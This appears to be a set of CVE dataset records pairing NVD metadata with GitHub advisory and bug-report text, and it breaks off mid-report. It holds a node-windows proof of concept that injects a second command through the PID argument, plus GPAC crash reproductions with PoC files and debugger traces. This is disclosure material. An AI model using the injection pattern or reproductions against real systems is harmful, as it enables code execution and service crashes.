[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:node-windows_project:node-windows:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "E0465900-004E-49F5-BAFB-9DC970F4722A", "versionEndExcluding": null, "versionEndIncluding": "0.1.14", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:node-windows_project:node-windows:1.0.0:beta1:*:*:*:node.js:*:*", "matchCriteriaId": "536FBF3C-A681-47C2-8FFC-CD0FF4584909", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:node-windows_project:node-windows:1.0.0:beta2:*:*:*:node.js:*:*", "matchCriteriaId": "41CDF172-07D0-4DC0-995F-9E99D542780E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:node-windows_project:node-windows:1.0.0:beta3:*:*:*:node.js:*:*", "matchCriteriaId": "C4DAF7DC-6FD3-4CE4-9B97-40CA802DE138", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:node-windows_project:node-windows:1.0.0:beta4:*:*:*:node.js:*:*", "matchCriteriaId": "894FCC14-8F06-4EB1-8B9B-0353A3DCA3DB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:node-windows_project:node-windows:1.0.0:beta5:*:*:*:node.js:*:*", "matchCriteriaId": "CBF43FA9-7DED-48E9-AB6E-89E510E440AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "77" ]
77
https://github.com/dwisiswant0/advisory/issues/4
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "dwisiswant0", "advisory" ]
## Description `lib/cmd.js` in the **node-windows** package before `1.0.0-beta.6` for Node.js allows command injection via the PID parameter. **CVE ID**: CVE-2021-45459 ## Proof of Concept ```js // poc.js var wincmd = require('node-windows'); wincmd.kill("12345; calc.exe", function(){ console.log('Process Killed'); }); ``` ## Impact This issue may lead to arbitrary command execution. ## References - https://github.com/coreybutler/node-windows/compare/1.0.0-beta.5...1.0.0-beta.6 - https://github.com/advisories/GHSA-53xv-c2hx-5w6q
OS Command Injection in node-windows
https://api.github.com/repos/dwisiswant0/advisory/issues/4/comments
2
2021-08-05T09:12:53Z
2021-12-23T05:28:12Z
https://github.com/dwisiswant0/advisory/issues/4
961,614,989
4
2,898
CVE-2021-45258
2021-12-22T17:15:09.263
A stack overflow vulnerability exists in gpac 1.1.0 via the gf_bifs_dec_proto_list function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1970" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1970" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1970
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A stack overflow was discovered in gf_bifs_dec_proto_list(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_8 ``` [poc_8.zip](https://github.com/gpac/gpac/files/7693778/poc_8.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type stbk in parent minf [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 832544 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type stbk in parent minf [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 832544 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing *** stack smashing detected ***: terminated [1] 3737450 abort ./MP4Box -lsr ./poc/poc_8 ``` **gdb** ``` *** stack smashing detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 *RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 *RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] RDX 0x0 *RDI 0x2 *RSI 0x7fffffff68a0 ◂— 0x0 *R8 0x0 *R9 0x7fffffff68a0 ◂— 0x0 *R10 0x8 *R11 0x246 *R12 0x7fffffff6b20 ◂— 0x0 *R13 0x20 *R14 0x7ffff7ffb000 ◂— 0x202a2a2a00001000 *R15 0x1 *RBP 0x7fffffff6c20 —▸ 0x7ffff76f607c ◂— '*** %s ***: terminated\n' *RSP 0x7fffffff68a0 ◂— 0x0 *RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff68a0 ◂— 0x0 01:0008│ 0x7fffffff68a8 —▸ 0x7ffff7546278 ◂— 0x10001200005bb2 02:0010│ 0x7fffffff68b0 —▸ 0x7fffffff6c40 —▸ 0x5555555df3b0 ◂— 0x6b6 03:0018│ 0x7fffffff68b8 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 04:0020│ 0x7fffffff68c0 ◂— 0xcd2709f17adf5bb6 05:0028│ 0x7fffffff68c8 ◂— 0x0 06:0030│ 0x7fffffff68d0 ◂— 0x7 07:0038│ 0x7fffffff68d8 ◂— 0x1 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff766eb4a __fortify_fail+42 f 4 0x7ffff766eb16 f 5 0x7ffff79064bc gf_bifs_dec_proto_list+2012 f 6 0xb6b6b6b6b6b6b6b6 f 7 0xb6b6b6b6b6b6b6b6 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7561859 in __GI_abort () at abort.c:79 #2 0x00007ffff75cc3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff76f607c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff766eb4a in __GI___fortify_fail (msg=msg@entry=0x7ffff76f6064 "stack smashing detected") at fortify_fail.c:26 #4 0x00007ffff766eb16 in __stack_chk_fail () at stack_chk_fail.c:24 #5 0x00007ffff79064bc in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0xb6b6b6b6b6b6b6b6 in ?? () #7 0xb6b6b6b6b6b6b6b6 in ?? () #8 0xb6b6b6b6b6b6b6b6 in ?? () #9 0xb6b6b6b6b6b6b6b6 in ?? () #10 0xb6b6b6b6b6b6b6b6 in ?? () #11 0xb6b6b6b6b6b6b6b6 in ?? () #12 0xb6b6b6b6b6b6b6b6 in ?? () #13 0xb6b6b6b6b6b6b6b6 in ?? () #14 0xb6b6b6b6b6b6b6b6 in ?? () #15 0xb6b6b6b6b6b6b6b6 in ?? () #16 0xb6b6b6b6b6b6b6b6 in ?? () #17 0xb6b6b6b6b6b6b6b6 in ?? () #18 0xb6b6b6b6b6b6b6b6 in ?? () #19 0xb6b6b6b6b6b6b6b6 in ?? () #20 0xb6b6b6b6b6b6b6b6 in ?? () #21 0xb6b6b6b6b6b6b6b6 in ?? () #22 0xb6b6b6b6b6b6b6b6 in ?? () #23 0xb6b6b6b6b6b6b6b6 in ?? () #24 0xb6b6b6b6b6b6b6b6 in ?? () #25 0xb6b6b6b6b6b6b6b6 in ?? () #26 0xb6b6b6b6b6b6b6b6 in ?? () #27 0xb6b6b6b6b6b6b6b6 in ?? () #28 0xb6b6b6b6b6b6b6b6 in ?? () #29 0xb6b6b6b6b6b6b6b6 in ?? () #30 0xb6b6b6b6b6b6b6b6 in ?? () #31 0xb6b6b6b6b6b6b6b6 in ?? () #32 0xb6b6b6b6b6b6b6b6 in ?? () #33 0xb6b6b6b6b6b6b6b6 in ?? () #34 0xb6b6b6b6b6b6b6b6 in ?? () #35 0xb6b6b6b6b6b6b6b6 in ?? () #36 0xb6b6b6b6b6b6b6b6 in ?? () #37 0xb6b6b6b6b6b6b6b6 in ?? () #38 0xb6b6b6b6b6b6b6b6 in ?? () #39 0xb6b6b6b6b6b6b6b6 in ?? () #40 0xb6b6b6b6b6b6b6b6 in ?? () #41 0xb6b6b6b6b6b6b6b6 in ?? () #42 0xb6b6b6b6b6b6b6b6 in ?? () #43 0xb6b6b6b6b6b6b6b6 in ?? () #44 0xb6b6b6b6b6b6b6b6 in ?? () #45 0xb6b6b6b6b6b6b6b6 in ?? () #46 0xb6b6b6b6b6b6b6b6 in ?? () #47 0xb6b6b6b6b6b6b6b6 in ?? () #48 0xb6b6b6b6b6b6b6b6 in ?? () #49 0xb6b6b6b6b6b6b6b6 in ?? () #50 0xb6b6b6b6b6b6b6b6 in ?? () #51 0xb6b6b6b6b6b6b6b6 in ?? () #52 0xb6b6b6b6b6b6b6b6 in ?? () #53 0xb6b6b6b6b6b6b6b6 in ?? () #54 0xb6b6b6b6b6b6b6b6 in ?? () #55 0xb6b6b6b6b6b6b6b6 in ?? () #56 0xb6b6b6b6b6b6b6b6 in ?? () #57 0xb6b6b6b6b6b6b6b6 in ?? () #58 0xb6b6b6b6b6b6b6b6 in ?? () #59 0xb6b6b6b6b6b6b6b6 in ?? () #60 0xb6b6b6b6b6b6b6b6 in ?? () #61 0xb6b6b6b6b6b6b6b6 in ?? () #62 0xb6b6b6b6b6b6b6b6 in ?? () #63 0xb6b6b6b6b6b6b6b6 in ?? () #64 0xb6b6b6b6b6b6b6b6 in ?? () #65 0xb6b6b6b6b6b6b6b6 in ?? () #66 0xb6b6b6b6b6b6b6b6 in ?? () #67 0xb6b6b6b6b6b6b6b6 in ?? () #68 0xb6b6b6b6b6b6b6b6 in ?? () #69 0xb6b6b6b6b6b6b6b6 in ?? () #70 0xb6b6b6b6b6b6b6b6 in ?? () #71 0xb6b6b6b6b6b6b6b6 in ?? () #72 0xb6b6b6b6b6b6b6b6 in ?? () #73 0xb6b6b6b6b6b6b6b6 in ?? () #74 0xb6b6b6b6b6b6b6b6 in ?? () #75 0xb6b6b6b6b6b6b6b6 in ?? () #76 0xb6b6b6b6b6b6b6b6 in ?? () #77 0xb6b6b6b6b6b6b6b6 in ?? () #78 0xb6b6b6b6b6b6b6b6 in ?? () #79 0xb6b6b6b6b6b6b6b6 in ?? () #80 0xb6b6b6b6b6b6b6b6 in ?? () #81 0xb6b6b6b6b6b6b6b6 in ?? () #82 0xb6b6b6b6b6b6b6b6 in ?? () #83 0xb6b6b6b6b6b6b6b6 in ?? () #84 0xb6b6b6b6b6b6b6b6 in ?? () #85 0xb6b6b6b6b6b6b6b6 in ?? () #86 0xb6b6b6b6b6b6b6b6 in ?? () #87 0xb6b6b6b6b6b6b6b6 in ?? () #88 0xb6b6b6b6b6b6b6b6 in ?? () #89 0xb6b6b6b6b6b6b6b6 in ?? () #90 0xb6b6b6b6b6b6b6b6 in ?? () #91 0xb6b6b6b6b6b6b6b6 in ?? () #92 0xb6b6b6b6b6b6b6b6 in ?? () #93 0xb6b6b6b6b6b6b6b6 in ?? () #94 0xb6b6b6b6b6b6b6b6 in ?? () #95 0xb6b6b6b6b6b6b6b6 in ?? () #96 0xb6b6b6b6b6b6b6b6 in ?? () #97 0xb6b6b6b6b6b6b6b6 in ?? () #98 0x000080b6b6b6b6b6 in ?? () #99 0x0000000000000002 in ?? () #100 0x0000000000000044 in ?? () #101 0x0000000000000008 in ?? () #102 0x00005555555c7e60 in ?? () #103 0x00005555555cf500 in ?? () #104 0x0000000000000000 in ?? () ``` `break gf_bifs_dec_proto_list` ``` Breakpoint 1, 0x00007ffff7905ce0 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────[ REGISTERS ]─────────────────────────────────── RAX 0x1 RBX 0x5555555d23b0 ◂— 0x0 RCX 0x710 RDX 0x5555555df2f0 ◂— 0x0 RDI 0x5555555de660 ◂— 0x0 RSI 0x5555555d23b0 ◂— 0x0 R8 0x0 R9 0x0 R10 0x7ffff775bc80 ◂— 'gf_sg_command_new' R11 0x7ffff7727be0 (main_arena+96) —▸ 0x5555555df320 ◂— 0x0 R12 0x5555555df2f0 ◂— 0x0 R13 0x5555555df1d0 ◂— 0x0 R14 0x5555555d42a0 ◂— 0x0 R15 0x0 RBP 0x5555555de660 ◂— 0x0 RSP 0x7fffffff7168 —▸ 0x7ffff7906559 (BD_DecSceneReplace+73) ◂— mov r12d, eax RIP 0x7ffff7905ce0 (gf_bifs_dec_proto_list) ◂— endbr64 ────────────────────────────────────[ DISASM ]──────────────────────────────────── ► 0x7ffff7905ce0 <gf_bifs_dec_proto_list> endbr64 0x7ffff7905ce4 <gf_bifs_dec_proto_list+4> push r15 0x7ffff7905ce6 <gf_bifs_dec_proto_list+6> push r14 0x7ffff7905ce8 <gf_bifs_dec_proto_list+8> push r13 0x7ffff7905cea <gf_bifs_dec_proto_list+10> mov r13, rsi 0x7ffff7905ced <gf_bifs_dec_proto_list+13> mov esi, 1 0x7ffff7905cf2 <gf_bifs_dec_proto_list+18> push r12 0x7ffff7905cf4 <gf_bifs_dec_proto_list+20> push rbp 0x7ffff7905cf5 <gf_bifs_dec_proto_list+21> push rbx 0x7ffff7905cf6 <gf_bifs_dec_proto_list+22> sub rsp, 0x488 0x7ffff7905cfd <gf_bifs_dec_proto_list+29> mov rax, qword ptr [rdi + 0x50] ────────────────────────────────────[ STACK ]───────────────────────────────────── 00:0000│ rsp 0x7fffffff7168 —▸ 0x7ffff7906559 (BD_DecSceneReplace+73) ◂— mov r12d, eax 01:0008│ 0x7fffffff7170 —▸ 0x5555555de660 ◂— 0x0 02:0010│ 0x7fffffff7178 —▸ 0x5555555df250 —▸ 0x5555555d4030 ◂— 0x0 03:0018│ 0x7fffffff7180 —▸ 0x5555555d23b0 ◂— 0x0 04:0020│ 0x7fffffff7188 —▸ 0x5555555df1d0 ◂— 0x0 05:0028│ 0x7fffffff7190 —▸ 0x5555555d42a0 ◂— 0x0 06:0030│ 0x7fffffff7198 —▸ 0x7ffff7914e5e (BM_SceneReplace+110) ◂— mov rsi, rbp 07:0038│ 0x7fffffff71a0 —▸ 0x5555555dea00 —▸ 0x5555555df1f0 —▸ 0x5555555df1a0 ◂— 0x0 ──────────────────────────────────[ BACKTRACE ]─────────────────────────────────── ► f 0 0x7ffff7905ce0 gf_bifs_dec_proto_list f 1 0x7ffff7906559 BD_DecSceneReplace+73 f 2 0x7ffff7914e5e BM_SceneReplace+110 f 3 0x7ffff7915023 BM_ParseCommand+179 f 4 0x7ffff7915353 gf_bifs_decode_command_list+163 f 5 0x7ffff7aa1d91 gf_sm_load_run_isom+1217 f 6 0x5555555844a8 dump_isom_scene+760 f 7 0x55555557b42c mp4boxMain+9228 ────────────────────────────────────────────────────────────────────────────────── pwndbg> c Continuing. Breakpoint 1, 0x00007ffff7905ce0 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────[ REGISTERS ]─────────────────────────────────── *RAX 0x0 *RBX 0x5555555df330 ◂— 0x6b6 *RCX 0x5555555dfdf0 ◂— 0x0 *RDX 0x0 RDI 0x5555555de660 ◂— 0xfffffffd RSI 0x5555555d23b0 ◂— 0x0 *R8 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6 *R9 0x7c *R10 0x7ffff775bf0a ◂— 'gf_sg_proto_get_graph' *R11 0x7ffff788b850 (gf_sg_proto_get_graph) ◂— endbr64 *R12 0x5555555de660 ◂— 0xfffffffd *R13 0x5555555d23b0 ◂— 0x0 R14 0x5555555d42a0 ◂— 0x0 *R15 0x7fffffff6d40 ◂— 0xb6b6b6b6b6b6b6b6 *RBP 0x6b6 *RSP 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov dword ptr [rsp + 0x14], eax RIP 0x7ffff7905ce0 (gf_bifs_dec_proto_list) ◂— endbr64 ────────────────────────────────────[ DISASM ]──────────────────────────────────── ► 0x7ffff7905ce0 <gf_bifs_dec_proto_list> endbr64 0x7ffff7905ce4 <gf_bifs_dec_proto_list+4> push r15 0x7ffff7905ce6 <gf_bifs_dec_proto_list+6> push r14 0x7ffff7905ce8 <gf_bifs_dec_proto_list+8> push r13 0x7ffff7905cea <gf_bifs_dec_proto_list+10> mov r13, rsi 0x7ffff7905ced <gf_bifs_dec_proto_list+13> mov esi, 1 0x7ffff7905cf2 <gf_bifs_dec_proto_list+18> push r12 0x7ffff7905cf4 <gf_bifs_dec_proto_list+20> push rbp 0x7ffff7905cf5 <gf_bifs_dec_proto_list+21> push rbx 0x7ffff7905cf6 <gf_bifs_dec_proto_list+22> sub rsp, 0x488 0x7ffff7905cfd <gf_bifs_dec_proto_list+29> mov rax, qword ptr [rdi + 0x50] ────────────────────────────────────[ STACK ]───────────────────────────────────── 00:0000│ rsp 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov dword ptr [rsp + 0x14], eax 01:0008│ 0x7fffffff6cb0 —▸ 0x7ffff775bc80 ◂— 'gf_sg_command_new' 02:0010│ 0x7fffffff6cb8 —▸ 0x5555555df330 ◂— 0x6b6 03:0018│ 0x7fffffff6cc0 ◂— 0xffff6d50 04:0020│ 0x7fffffff6cc8 —▸ 0x5555555de660 ◂— 0xfffffffd 05:0028│ 0x7fffffff6cd0 —▸ 0x5555555df2f0 —▸ 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6 06:0030│ 0x7fffffff6cd8 —▸ 0x5555555d4030 ◂— 0x0 07:0038│ 0x7fffffff6ce0 ◂— 0x0 ──────────────────────────────────[ BACKTRACE ]─────────────────────────────────── ► f 0 0x7ffff7905ce0 gf_bifs_dec_proto_list f 1 0x7ffff79062d7 gf_bifs_dec_proto_list+1527 f 2 0xb6b6b6b6b6b6b6b6 f 3 0xb6b6b6b6b6b6b6b6 f 4 0xb6b6b6b6b6b6b6b6 f 5 0xb6b6b6b6b6b6b6b6 f 6 0xb6b6b6b6b6b6b6b6 f 7 0xb6b6b6b6b6b6b6b6 ────────────────────────────────────────────────────────────────────────────────── pwndbg> stack 200 00:0000│ rsp 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov dword ptr [rsp + 0x14], eax 01:0008│ 0x7fffffff6cb0 —▸ 0x7ffff775bc80 ◂— 'gf_sg_command_new' 02:0010│ 0x7fffffff6cb8 —▸ 0x5555555df330 ◂— 0x6b6 03:0018│ 0x7fffffff6cc0 ◂— 0xffff6d50 04:0020│ 0x7fffffff6cc8 —▸ 0x5555555de660 ◂— 0xfffffffd 05:0028│ 0x7fffffff6cd0 —▸ 0x5555555df2f0 —▸ 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6 06:0030│ 0x7fffffff6cd8 —▸ 0x5555555d4030 ◂— 0x0 07:0038│ 0x7fffffff6ce0 ◂— 0x0 ... ↓ 2 skipped 0a:0050│ 0x7fffffff6cf8 —▸ 0x7ffff7fc7000 —▸ 0x7ffff7743000 ◂— 0x10102464c457f 0b:0058│ 0x7fffffff6d00 —▸ 0x7fffffff6d90 ◂— 0xb6b6b6b6b6b6b6b6 0c:0060│ 0x7fffffff6d08 ◂— 0x0 0d:0068│ 0x7fffffff6d10 —▸ 0x7ffff7fc7000 —▸ 0x7ffff7743000 ◂— 0x10102464c457f 0e:0070│ 0x7fffffff6d18 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ... 0f:0078│ 0x7fffffff6d20 ◂— 0x0 10:0080│ 0x7fffffff6d28 ◂— 0x0 11:0088│ 0x7fffffff6d30 ◂— 0x1 12:0090│ 0x7fffffff6d38 ◂— 0x7fff00000001 13:0098│ r15 0x7fffffff6d40 ◂— 0xb6b6b6b6b6b6b6b6 ... ↓ 180 skipped pwndbg> ```
Stack Overflow in gf_bifs_dec_proto_list()
https://api.github.com/repos/gpac/gpac/issues/1970/comments
0
2021-12-10T15:36:08Z
2021-12-13T13:22:07Z
https://github.com/gpac/gpac/issues/1970
1,076,972,078
1,970
2,899
CVE-2021-45259
2021-12-22T17:15:09.310
An Invalid pointer reference vulnerability exists in gpac 1.1.0 via the gf_svg_node_del function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1986" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1986" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:dev:*:*:*:*:*:*", "matchCriteriaId": "A713E8C4-E079-4ECB-AF9C-DC0EC80D089D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1986
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An Invalid free was discovered in gf_svg_node_del(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/root/fuck_bin/gpac/test Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt poc ``` [gf_svg_node_del-gf_node_unregister.zip](https://github.com/gpac/gpac/files/7708298/gf_svg_node_del-gf_node_unregister.zip) **Result** ``` ┌─[root@aidai-virtual-machine] - [~/fuck_bin/gpac/results/fuckbt2] - [二 12月 14, 10:45] └─[$] <> ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,sig:11,src:004575+004803,op:splice,rep:2 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [1] 3777658 segmentation fault ../../test/lib/MP4Box -bt ┌─[root@aidai-virtual-machine] - [~/fuck_bin/gpac/results/fuckbt2] - [二 12月 14, 10:45] └─[$] <> /root/fuck_bin/gpac/test/lib/MP4Box -bt gf_svg_node_del-gf_node_unregister/id:000409,sig:11,src:004547,op:havoc,rep:8 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown 